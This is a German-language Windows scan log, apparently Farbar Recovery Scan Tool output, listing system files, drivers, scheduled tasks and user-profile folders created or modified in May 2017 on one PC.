2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation)
C:\WINDOWS\system32\WiFiDisplay.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Drivers\netvsc.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference 
Assemblies 2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild 2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles 2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe 2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe 2017-05-07 17:23 - 2017-05-23 18:30 - 02078284 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml 2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml 2017-05-07 17:17 - 2017-05-23 18:25 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2 2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater 2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} 2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ 
C:\WINDOWS\System32\Tasks\SamsungMagician 2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS 2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared 2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino 2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten 2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten 2017-05-07 17:13 - 2017-05-23 18:24 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin 2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD 2017-05-07 17:13 - 2017-05-16 18:16 
- 00000000 ____D C:\WINDOWS\system32\SleepStudy 2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies 2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS 2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll 2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys 2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther 2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk 2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP 2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP 2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP 2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard 2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 
2017-05-23 18:30 - 2017-03-20 06:41 - 00924424 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-23 18:30 - 2017-03-20 06:41 - 00197434 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-23 18:29 - 2017-03-18 13:40 - 00065536 _____ C:\WINDOWS\system32\config\ELAM
2017-05-23 18:25 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-23 18:25 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-23 18:25 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-23 18:24 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-23 18:24 - 2017-02-05 21:38 - 00018061 _____ C:\bdlog.txt
2017-05-23 17:51 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-23 17:51 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-23 17:51 - 2015-05-01 17:30 - 132223576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-23 17:51 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-22 18:20 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-22 18:14 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-21 21:36 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
